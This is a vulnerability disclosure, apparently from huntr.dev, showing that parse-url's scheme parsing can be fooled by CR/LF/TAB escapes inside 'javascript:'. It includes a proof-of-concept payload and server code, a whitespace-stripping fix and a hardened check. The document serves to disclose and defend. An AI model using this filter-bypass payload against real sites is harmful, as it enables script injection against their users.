huntr / amammad / 4E046C63-B1CA-4BCC-B418-29796918A71B
History: Jun 07, 2022 - 9:07 a.m.

Run malicious JS code with other kinds of encoding

2022-06-07 09:07:12
amammad
www.huntr.dev

EPSS: 0.001 (Low), Percentile: 30.2%

Description

We can run malicious JS code by hiding whitespace inside the scheme with escape sequences: ASCII escapes that start with \x and Unicode escapes that start with \u, for example:

CR ==> \x0d and \u000d

LF ==> \x0a and \u000a

TAB ==> \t, \u0009 and \x09

So there are many such characters, and we can't filter all of them one by one!

Fix suggestion

I have a good, maybe even perfect, fix:

In parse-url, add url = (url || "").replace(/\s/gmi, '') at this line of code to remove all whitespace (including the encoded forms, which are already decoded into the string by then) from every part of the string.

Proof of Concept

const http = require("http");
const parseUrl = require("parse-url");
// The CR (\u000D) inside "javascript" splits the scheme as parse-url sees it,
// so the scheme check below does not recognise it as javascript:
const url = parseUrl('jav\u000Dascript://%0aalert(1)');
console.log(url);
const server = http.createServer((request, response) => {
    response.writeHead(200);
    // Blocklist check on the parsed scheme; it is bypassed because the
    // scheme parse-url returns is neither "javascript" nor null.
    if (url.scheme !== "javascript" && url.scheme !== null) {
        response.end("<a href>Wowww!</a>");
    }
    else {
        response.end("Nooo!");
    }
});
// Port 80 needs elevated privileges; change it if you run this as a normal user.
server.listen(80, "127.0.0.1", function () {
    console.log("http://" + this.address().address + ":" + this.address().port);
});
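As an added example (not code from this report or from the parse-url project), the following reproduces the bypass pattern against a naive scheme extractor and applies the whitespace-stripping fix suggested above before any scheme check; naiveScheme, stripWhitespace and isBlockedScheme are hypothetical names chosen for this illustration.

```javascript
// Added example, not part of the huntr report or of parse-url.
// It shows why an embedded CR/LF/TAB defeats a scheme blocklist and how
// stripping every \s match before parsing closes that gap.

// Naive scheme extraction: stops at the first character that is not
// allowed in a scheme, so 'jav\u000Dascript:' yields no scheme at all
// and a check such as `scheme !== "javascript"` never sees the real value.
function naiveScheme(raw) {
  const m = /^([a-zA-Z][a-zA-Z0-9+.-]*):/.exec(raw);
  return m ? m[1].toLowerCase() : null;
}

// The fix from the report: remove all whitespace (\t \n \r \v \f, space and
// the Unicode space separators) from every position, not just the ends.
// By the time the string reaches us, \x0d / \u000d escapes are already the
// raw characters, so one \s pass covers every spelling of the same byte.
function stripWhitespace(url) {
  return (url || "").replace(/\s/g, "");
}

// Hardened check: normalise first, then extract the scheme. The WHATWG URL
// parser built into Node is used as a cross-check because browsers parse
// href values the same way (it drops ASCII tab, LF and CR anywhere in the
// input by specification); "data" and "vbscript" are constructed additions
// to the blocklist for this example.
function isBlockedScheme(raw) {
  const cleaned = stripWhitespace(raw);
  let whatwg = null;
  try {
    whatwg = new URL(cleaned).protocol.replace(/:$/, "");
  } catch (e) {
    // Not an absolute URL: nothing for the blocklist to match on.
  }
  const scheme = naiveScheme(cleaned) || whatwg;
  return scheme === "javascript" || scheme === "vbscript" || scheme === "data";
}
```

Note that \s does not match other C0 control characters (such as NUL); those are not URL whitespace and the WHATWG parser rejects an absolute URL containing them inside the scheme, which is why the cross-check is kept.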
